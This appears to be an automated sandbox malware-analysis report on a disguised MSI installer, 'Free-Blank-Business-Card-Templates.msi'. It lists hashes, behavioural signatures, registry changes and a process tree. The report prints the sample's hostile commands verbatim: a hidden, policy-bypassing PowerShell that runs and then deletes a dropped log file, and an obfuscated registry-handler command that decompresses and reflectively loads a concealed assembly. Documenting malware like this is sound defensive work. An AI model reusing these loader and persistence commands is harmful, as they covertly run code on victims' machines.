Analysis
max time kernel: 119s
max time network: 122s
platform: windows7_x64
resource: win7-20240221-en
resource tags: arch:x64, arch:x86, image:win7-20240221-en, locale:en-us, os:windows7-x64, system
submitted: 03-04-2024 21:30
Static task: static1
Behavioral task: behavioral1
Sample: Free-Blank-Business-Card-Templates.msi
Resource: win7-20240221-en
General
Target: Free-Blank-Business-Card-Templates.msi
Size: 101.8MB
MD5: 8213911a074f0b37b018ab4c14e5b4a5
SHA1: 84fbbfa8104318df77ec1b229c06b6e343bcea15
SHA256: c61348ab7e5ffeb9ba5d1077b13c49bde4d841c5ada9a119f8234af89421f783
SHA512: 9f8baf44b58f7b79ed01c0dbb1f492b7caa651df7507e6b780278dc238645f51199fc4105b59def5e7136aa7f59f7d51740aa85eef684056b35e06b057fcc9a5
SSDEEP: 49152:WwxcLDe+cpl7+GgyV27HgTrztiIpqtSZFI6UUUUUUUUUUUUUUUUUUUUUUUUUUUUx:xa/MpZugTFZFIYN
Malware Config
Signatures
Drops startup file 1 IoCs
description ioc Process
File created C:\Users\Admin\AppData\Roaming\MIcROsOFT\WinDows\sTaRt MEnU\pRogRamS\STARtuP\a58b5a508824529c0afbb90f2b8d6.LnK powershell.exe
Blocklisted process makes network request 2 IoCs
flow pid Process
3 1664 msiexec.exe
5 2656 msiexec.exe
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process
File opened (read-only) \??\R: msiexec.exe
File opened (read-only) \??\V: msiexec.exe
File opened (read-only) \??\Y: msiexec.exe
File opened (read-only) \??\I: msiexec.exe
File opened (read-only) \??\N: msiexec.exe
File opened (read-only) \??\V: msiexec.exe
File opened (read-only) \??\K: msiexec.exe
File opened (read-only) \??\P: msiexec.exe
File opened (read-only) \??\O: msiexec.exe
File opened (read-only) \??\R: msiexec.exe
File opened (read-only) \??\X: msiexec.exe
File opened (read-only) \??\U: msiexec.exe
File opened (read-only) \??\A: msiexec.exe
File opened (read-only) \??\J: msiexec.exe
File opened (read-only) \??\A: msiexec.exe
File opened (read-only) \??\B: msiexec.exe
File opened (read-only) \??\P: msiexec.exe
File opened (read-only) \??\S: msiexec.exe
File opened (read-only) \??\T: msiexec.exe
File opened (read-only) \??\L: msiexec.exe
File opened (read-only) \??\Q: msiexec.exe
File opened (read-only) \??\U: msiexec.exe
File opened (read-only) \??\G: msiexec.exe
File opened (read-only) \??\J: msiexec.exe
File opened (read-only) \??\Z: msiexec.exe
File opened (read-only) \??\W: msiexec.exe
File opened (read-only) \??\X: msiexec.exe
File opened (read-only) \??\E: msiexec.exe
File opened (read-only) \??\L: msiexec.exe
File opened (read-only) \??\Y: msiexec.exe
File opened (read-only) \??\B: msiexec.exe
File opened (read-only) \??\T: msiexec.exe
File opened (read-only) \??\Z: msiexec.exe
File opened (read-only) \??\H: msiexec.exe
File opened (read-only) \??\E: msiexec.exe
File opened (read-only) \??\I: msiexec.exe
File opened (read-only) \??\M: msiexec.exe
File opened (read-only) \??\N: msiexec.exe
File opened (read-only) \??\K: msiexec.exe
File opened (read-only) \??\W: msiexec.exe
File opened (read-only) \??\H: msiexec.exe
File opened (read-only) \??\O: msiexec.exe
File opened (read-only) \??\S: msiexec.exe
File opened (read-only) \??\M: msiexec.exe
File opened (read-only) \??\Q: msiexec.exe
File opened (read-only) \??\G: msiexec.exe
Drops file in System32 directory 1 IoCs
description ioc Process
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe
Drops file in Windows directory 17 IoCs
description ioc Process
File opened for modification C:\Windows\Installer\MSIC409.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSIC504.tmp msiexec.exe
File opened for modification C:\Windows\Installer\f76adae.ipi msiexec.exe
File opened for modification C:\Windows\Installer\f76adad.msi msiexec.exe
File opened for modification C:\Windows\Installer\MSIBCD3.tmp msiexec.exe
File opened for modification C:\Windows\Installer\ msiexec.exe
File opened for modification C:\Windows\Installer\MSIBF53.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSIBFF0.tmp msiexec.exe
File opened for modification C:\Windows\INF\setupapi.ev1 DrvInst.exe
File created C:\Windows\Installer\f76adad.msi msiexec.exe
File opened for modification C:\Windows\Installer\MSIC010.tmp msiexec.exe
File created C:\Windows\Installer\f76adb0.msi msiexec.exe
File created C:\Windows\Installer\f76adae.ipi msiexec.exe
File opened for modification C:\Windows\Installer\MSIC149.tmp msiexec.exe
File opened for modification C:\Windows\Installer\MSIC6BB.tmp msiexec.exe
File opened for modification C:\Windows\INF\setupapi.ev3 DrvInst.exe
File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe
Executes dropped EXE 1 IoCs
pid Process
1000 pdfelement-pro_setup_full5239.exe
Loads dropped DLL 10 IoCs
pid Process
868 MsiExec.exe
868 MsiExec.exe
1724 MsiExec.exe
1724 MsiExec.exe
1724 MsiExec.exe
1724 MsiExec.exe
1724 MsiExec.exe
1724 MsiExec.exe
1724 MsiExec.exe
868 MsiExec.exe
Modifies Internet Explorer settings
description ioc Process
Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000\Software\Microsoft\Internet Explorer\Main pdfelement-pro_setup_full5239.exe
Modifies data under HKEY_USERS 43 IoCs
description ioc Process
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates DrvInst.exe
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\2D\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA DrvInst.exe
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs DrvInst.exe
Modifies registry class 7 IoCs
description ioc Process
Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\gsmcjyhqvupekbldztl\shell\open powershell.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\gsmcjyhqvupekbldztl\shell\open\command\ = "poWErSHELL -windOWSTyLe hiDden -Ep BYpASS -cOmmAND \"[SYStEm.rEFLeCTioN.aSsEMBlY]::LOad({$aeb4235fa7c4828337a0569760676=neW-OBJect SYSTEm.IO.memORYsTrEam(, $args[0]);$a8d824c68d14f09a2475882591cde=NEW-OBJeCt sYsteM.Io.mEMORYsTreaM;$a0b2951b9f3456a1816344df08f46=NEw-oBJECT SySTeM.Io.cOmPREssIOn.GzipStrEam $aeb4235fa7c4828337a0569760676, ([Io.CoMPRESSion.compreSSIONMODe]::DecomPREss);$a0b2951b9f3456a1816344df08f46.CoPYtO($a8d824c68d14f09a2475882591cde);$a0b2951b9f3456a1816344df08f46.clOsE();$aeb4235fa7c4828337a0569760676.cLOSE();retUrn $a8d824c68d14f09a2475882591cde.toARRaY();}.InvOke([sYStEm.Io.FiLe]::rEADALLbyTEs('C:\\Users\\Admin\\AppData\\Roaming\\AdOBe\\vtxciSReENAKGMp\\bmatlFpPeiJUHYVE.TtQDWqjiHYONr')));[a53af4949324c69d41059be2ad458.ac905c3dc3b419a26727bd3069e4c]::ada7f940e0d479bab05702d4c32ea()\"" powershell.exe
Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\.xznewhtvcqrlyp powershell.exe
Set value (str) \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\.xznewhtvcqrlyp\ = "gsmcjyhqvupekbldztl" powershell.exe
Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\gsmcjyhqvupekbldztl\shell\open\command powershell.exe
Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\gsmcjyhqvupekbldztl powershell.exe
Key created \REGISTRY\USER\S-1-5-21-1658372521-4246568289-2509113762-1000_CLASSES\gsmcjyhqvupekbldztl\shell powershell.exe
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process
2656 msiexec.exe
2656 msiexec.exe
2776 powershell.exe
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process
Token: SeShutdownPrivilege 1664 msiexec.exe
Token: SeIncreaseQuotaPrivilege 1664 msiexec.exe
Token: SeRestorePrivilege 2656 msiexec.exe
Token: SeTakeOwnershipPrivilege 2656 msiexec.exe
Token: SeSecurityPrivilege 2656 msiexec.exe
Token: SeCreateTokenPrivilege 1664 msiexec.exe
Token: SeAssignPrimaryTokenPrivilege 1664 msiexec.exe
Token: SeLockMemoryPrivilege 1664 msiexec.exe
Token: SeIncreaseQuotaPrivilege 1664 msiexec.exe
Token: SeMachineAccountPrivilege 1664 msiexec.exe
Token: SeTcbPrivilege 1664 msiexec.exe
Token: SeSecurityPrivilege 1664 msiexec.exe
Token: SeTakeOwnershipPrivilege 1664 msiexec.exe
Token: SeLoadDriverPrivilege 1664 msiexec.exe
Token: SeSystemProfilePrivilege 1664 msiexec.exe
Token: SeSystemtimePrivilege 1664 msiexec.exe
Token: SeProfSingleProcessPrivilege 1664 msiexec.exe
Token: SeIncBasePriorityPrivilege 1664 msiexec.exe
Token: SeCreatePagefilePrivilege 1664 msiexec.exe
Token: SeCreatePermanentPrivilege 1664 msiexec.exe
Token: SeBackupPrivilege 1664 msiexec.exe
Token: SeRestorePrivilege 1664 msiexec.exe
Token: SeShutdownPrivilege 1664 msiexec.exe
Token: SeDebugPrivilege 1664 msiexec.exe
Token: SeAuditPrivilege 1664 msiexec.exe
Token: SeSystemEnvironmentPrivilege 1664 msiexec.exe
Token: SeChangeNotifyPrivilege 1664 msiexec.exe
Token: SeRemoteShutdownPrivilege 1664 msiexec.exe
Token: SeUndockPrivilege 1664 msiexec.exe
Token: SeSyncAgentPrivilege 1664 msiexec.exe
Token: SeEnableDelegationPrivilege 1664 msiexec.exe
Token: SeManageVolumePrivilege 1664 msiexec.exe
Token: SeImpersonatePrivilege 1664 msiexec.exe
Token: SeCreateGlobalPrivilege 1664 msiexec.exe
Token: SeCreateTokenPrivilege 1664 msiexec.exe
Token: SeAssignPrimaryTokenPrivilege 1664 msiexec.exe
Token: SeLockMemoryPrivilege 1664 msiexec.exe
Token: SeIncreaseQuotaPrivilege 1664 msiexec.exe
Token: SeMachineAccountPrivilege 1664 msiexec.exe
Token: SeTcbPrivilege 1664 msiexec.exe
Token: SeSecurityPrivilege 1664 msiexec.exe
Token: SeTakeOwnershipPrivilege 1664 msiexec.exe
Token: SeLoadDriverPrivilege 1664 msiexec.exe
Token: SeSystemProfilePrivilege 1664 msiexec.exe
Token: SeSystemtimePrivilege 1664 msiexec.exe
Token: SeProfSingleProcessPrivilege 1664 msiexec.exe
Token: SeIncBasePriorityPrivilege 1664 msiexec.exe
Token: SeCreatePagefilePrivilege 1664 msiexec.exe
Token: SeCreatePermanentPrivilege 1664 msiexec.exe
Token: SeBackupPrivilege 1664 msiexec.exe
Token: SeRestorePrivilege 1664 msiexec.exe
Token: SeShutdownPrivilege 1664 msiexec.exe
Token: SeDebugPrivilege 1664 msiexec.exe
Token: SeAuditPrivilege 1664 msiexec.exe
Token: SeSystemEnvironmentPrivilege 1664 msiexec.exe
Token: SeChangeNotifyPrivilege 1664 msiexec.exe
Token: SeRemoteShutdownPrivilege 1664 msiexec.exe
Token: SeUndockPrivilege 1664 msiexec.exe
Token: SeSyncAgentPrivilege 1664 msiexec.exe
Token: SeEnableDelegationPrivilege 1664 msiexec.exe
Token: SeManageVolumePrivilege 1664 msiexec.exe
Token: SeImpersonatePrivilege 1664 msiexec.exe
Token: SeCreateGlobalPrivilege 1664 msiexec.exe
Token: SeCreateTokenPrivilege 1664 msiexec.exe
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process
1664 msiexec.exe
1664 msiexec.exe
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process
1000 pdfelement-pro_setup_full5239.exe
1000 pdfelement-pro_setup_full5239.exe
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target
PID 2656 wrote to memory of 868 2656 msiexec.exe 29
PID 2656 wrote to memory of 868 2656 msiexec.exe 29
PID 2656 wrote to memory of 868 2656 msiexec.exe 29
PID 2656 wrote to memory of 868 2656 msiexec.exe 29
PID 2656 wrote to memory of 868 2656 msiexec.exe 29
PID 2656 wrote to memory of 340 2656 msiexec.exe 33
PID 2656 wrote to memory of 340 2656 msiexec.exe 33
PID 2656 wrote to memory of 340 2656 msiexec.exe 33
PID 2656 wrote to memory of 340 2656 msiexec.exe 33
PID 2656 wrote to memory of 340 2656 msiexec.exe 33
PID 2656 wrote to memory of 340 2656 msiexec.exe 33
PID 2656 wrote to memory of 340 2656 msiexec.exe 33
PID 2656 wrote to memory of 1724 2656 msiexec.exe 34
PID 2656 wrote to memory of 1724 2656 msiexec.exe 34
PID 2656 wrote to memory of 1724 2656 msiexec.exe 34
PID 2656 wrote to memory of 1724 2656 msiexec.exe 34
PID 2656 wrote to memory of 1724 2656 msiexec.exe 34
PID 1724 wrote to memory of 2776 1724 MsiExec.exe 35
PID 1724 wrote to memory of 2776 1724 MsiExec.exe 35
PID 1724 wrote to memory of 2776 1724 MsiExec.exe 35
PID 1724 wrote to memory of 1000 1724 MsiExec.exe 37
PID 1724 wrote to memory of 1000 1724 MsiExec.exe 37
PID 1724 wrote to memory of 1000 1724 MsiExec.exe 37
PID 1724 wrote to memory of 1000 1724 MsiExec.exe 37
PID 1724 wrote to memory of 1000 1724 MsiExec.exe 37
PID 1724 wrote to memory of 1000 1724 MsiExec.exe 37
PID 1724 wrote to memory of 1000 1724 MsiExec.exe 37
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
C:\Windows\system32\msiexec.exe
msiexec.exe /I C:\Users\Admin\AppData\Local\Temp\Free-Blank-Business-Card-Templates.msi
- Blocklisted process makes network request
- Enumerates connected drives
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:1664

C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
- Blocklisted process makes network request
- Enumerates connected drives
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2656

  C:\Windows\system32\MsiExec.exe
  C:\Windows\system32\MsiExec.exe -Embedding F8D0E1A71C8C0EC9CEC10EB2BABB2003 C
  - Loads dropped DLL
  PID:868

  C:\Windows\syswow64\MsiExec.exe
  C:\Windows\syswow64\MsiExec.exe -Embedding 85C0AD17C0B766C13881CFB200DC4924
  PID:340

  C:\Windows\system32\MsiExec.exe
  C:\Windows\system32\MsiExec.exe -Embedding CC29E9BD2412F90E11A19603FC1BBB99
  - Loads dropped DLL
  - Suspicious use of WriteProcessMemory
  PID:1724

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -windowstyle hidden -command "$p='C:\Users\Admin\AppData\Roaming\pd.log';iex(get-content $p);[system.io.file]::delete($p)"
    - Drops startup file
    - Drops file in System32 directory
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    PID:2776

    C:\Users\Admin\AppData\Roaming\pdfelement-pro_setup_full5239.exe
    "C:\Users\Admin\AppData\Roaming\pdfelement-pro_setup_full5239.exe"
    - Executes dropped EXE
    - Modifies Internet Explorer settings
    - Suspicious use of SetWindowsHookEx
    PID:1000

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
PID:2692

C:\Windows\system32\DrvInst.exe
DrvInst.exe "1" "200" "STORAGE\VolumeSnapshot\HarddiskVolumeSnapshot19" "" "" "61530dda3" "0000000000000000" "00000000000003B4" "00000000000005AC"
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1228
Network
MITRE ATT&CK Enterprise v15
Downloads